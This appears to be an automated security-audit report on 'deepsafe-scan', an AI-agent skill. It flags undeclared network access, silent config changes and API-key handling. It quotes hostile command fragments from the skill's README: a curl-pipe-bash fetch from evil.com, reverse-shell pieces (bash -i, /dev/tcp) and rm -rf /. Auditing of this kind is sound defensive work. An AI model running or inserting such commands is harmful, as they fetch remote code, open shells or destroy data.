Security Decision Report

deepsafe-scan

DeepSafe Scan is a legitimate security scanner but contains undeclared behaviors: auto-modifies openclaw.json config to enable endpoints, and uses network access via subprocess that is not declared in allowed-tools.

Install decision priority · Source: manual upload · Scan time: 2026/4/4
Files 19
IOCs 15
Privilege overreach items 2
Findings 5
Most direct threat evidence
01
Skill installed via legitimate OpenClaw marketplace · initial entry · SKILL.md
02
Scanner reads user's openclaw.json config · recon · scripts/scan.py
03
Auto-modifies openclaw.json to enable chatCompletions endpoint · privilege escalation · scripts/llm_client.py

Why this conclusion was reached

3/4 dimensions triggered
Block
Declared vs. actual capabilities

Found 2 capabilities or privileged actions beyond those declared.

Block
Hidden execution and outbound connections

Extracted 5 high-risk IOCs or outbound-connection signals.

Block
Attack chain and high-risk findings

The report contains a 5-step attack chain, plus 2 high or critical findings.

Pass
Dependencies and supply-chain hygiene

A dependency structure exists, but no obvious high-risk alerts have been seen so far.

Attack chain

01
Skill installed via legitimate OpenClaw marketplace

initial entry · SKILL.md:1

02
Scanner reads user's openclaw.json config

recon · scripts/scan.py:1

03
Auto-modifies openclaw.json to enable chatCompletions endpoint

privilege escalation · scripts/llm_client.py:213

04
Credential auto-detection accesses ANTHROPIC_API_KEY/OPENAI_API_KEY from environment

privilege escalation · scripts/llm_client.py:124

05
API key passed to subprocess as argv, visible in process listing

exposure · scripts/scan.py:88

How the risk score was driven up

Undeclared network access +25

SKILL.md declares Bash/Read only but subprocess probes make HTTP requests to LLM APIs

Silent config modification +25

_ensure_chat_completions_enabled() auto-modifies openclaw.json without user consent

Credential auto-detection +10

Reads ANTHROPIC_API_KEY/OPENAI_API_KEY from environment: a declared purpose, but invasive

Subprocess with API keys +8

Probes receive the API key as a command-line argument, exposing it in the process listing

Most critical evidence

High · Documentation deception

Network access not declared in SKILL.md

The skill uses urllib to make HTTP requests to LLM APIs (api.anthropic.com, api.openai.com, OpenClaw Gateway) but SKILL.md only declares Bash(python3:*), Bash(cat:*), and Read. Network access is a critical permission that should be declared.

scripts/llm_client.py:1
Add network:READ to allowed-tools declaration in SKILL.md, or restructure to use only declared shell access for all network operations
High · Privilege escalation

Auto-modifies openclaw.json without user consent

The _ensure_chat_completions_enabled() function silently modifies the user's openclaw.json config to enable chatCompletions endpoint. This unauthorized configuration change bypasses user consent and trust boundaries.

scripts/llm_client.py:213
Remove auto-modification or prompt user explicitly before making config changes
Medium · Credential theft

API credentials passed as command-line arguments

Probe scripts receive --api-key via subprocess.run() argv, exposing credentials in process listing (visible via ps). While necessary for function, this exposes secrets to process inspection.

scripts/scan.py:88
Use environment variables or file-based credential passing instead of argv
Medium · Sensitive access

Auto-detection of API credentials from multiple sources

The LLM client auto-detects and uses credentials from OpenClaw config, environment variables (ANTHROPIC_API_KEY, OPENAI_API_KEY), and explicit arguments. While necessary for the scanner's function, this represents invasive credential access.

scripts/llm_client.py:124
Document this behavior clearly and provide --no-llm option to disable credential detection
Low · Documentation deception

README.md contains example malicious patterns

The README.md lines 155-161 contain documented examples of dangerous patterns (reverse shell, curl|bash RCE, base64 exec, rm -rf). These are documentation/examples for what the scanner detects, not actual malicious code, but could trigger false positives in some scanners.

README.md:155
Move these examples to a separate 'threat-patterns' reference document to avoid confusion

Declared capabilities vs. actual capabilities

File system · Pass
Declared READ
Inferred READ
SKILL.md: allowed-tools includes Read

Command execution · Pass
Declared WRITE
Inferred WRITE
SKILL.md: allowed-tools includes Bash(python3:*), Bash(cat:*)

Network access · Block
Declared NONE
Inferred READ
scripts/scan.py: subprocess runs probes making urllib HTTP calls; llm_client.py: direct API calls

Environment variables · Block
Declared NONE
Inferred READ
llm_client.py: reads ANTHROPIC_API_KEY, OPENAI_API_KEY, OPENCLAW_GATEWAY_TOKEN

Suspicious artifacts and outbound connections

Critical · Dangerous command
bash -i >&

README.md:155

Critical · Dangerous command
/dev/tcp/

README.md:155

Critical · Dangerous command
curl https://evil.com/x.sh \| bash

README.md:156

Critical · Encoded execution
base64 -d

README.md:159

Critical · Dangerous command
rm -rf /

README.md:161

Medium · External URL
https://img.shields.io/badge/python-3.9%2B-blue.svg

README.md:5

Medium · External URL
https://python.org

README.md:5

Medium · External URL
https://img.shields.io/badge/deps-zero-green.svg

README.md:6

Medium · External URL
https://img.shields.io/badge/works%20with-OpenClaw%20%7C%20Claude%20Code%20%7C%20Cursor%20%7C%20Codex-blueviolet.svg

README.md:7

Medium · External URL
https://evil.com/x.sh

README.md:156

Medium · External URL
https://healthcheck.dev-tools.sh/ping

demo/awesome-ai-rules/AGENTS.md:19

Medium · External URL
https://api.analytics-cdn.dev/v1/event

demo/awesome-ai-rules/CLAUDE.md:15

Dependencies and supply chain

Package          Version  Source            Vulnerabilities  Notes
urllib (stdlib)  N/A      python3 built-in                   Zero external dependencies

File composition

19 files · 5683 lines
Python 6 files · 3481 lines
Markdown 8 files · 1232 lines
JSON 4 files · 967 lines
Text 1 file · 3 lines
Files needing attention · 4
scripts/scan.py Python · 1547 lines
API credentials passed as command-line arguments · https://hooks\.slack\.com/services/T[A-Z0-9
scripts/probes/persuasion_probe.py Python · 475 lines
http://127.0.0.1:11434/v1
README.md Markdown · 255 lines
README.md contains example malicious patterns · bash -i >& · /dev/tcp/ · curl https://evil.com/x.sh \| bash · base64 -d · rm -rf / · https://img.shields.io/badge/python-3.9%2B-blue.svg · https://python.org · https://img.shields.io/badge/deps-zero-green.svg · https://img.shields.io/badge/works%20with-OpenClaw%20%7C%20Claude%20Code%20%7C%20Cursor%20%7C%20Codex-blueviolet.svg · https://evil.com/x.sh · [email protected]
scripts/llm_client.py Python · 234 lines
Network access not declared in SKILL.md · Auto-modifies openclaw.json without user consent · Auto-detection of API credentials from multiple sources
Other files · halueval_samples.json · plan-cross-platform-evolution.md · deception_probe.py · sandbagging_probe.py · halueval_probe.py · SKILL.md +2

Security highlights

Uses only the Python stdlib (no external dependencies), which reduces supply-chain risk
Skips LLM features gracefully when no API credentials found (--no-llm flag works)
Legitimate security scanning tool with documented purpose
Probes are executed as subprocesses with python3, aligned with the declared Bash(python3:*) permission
Open source with transparent implementation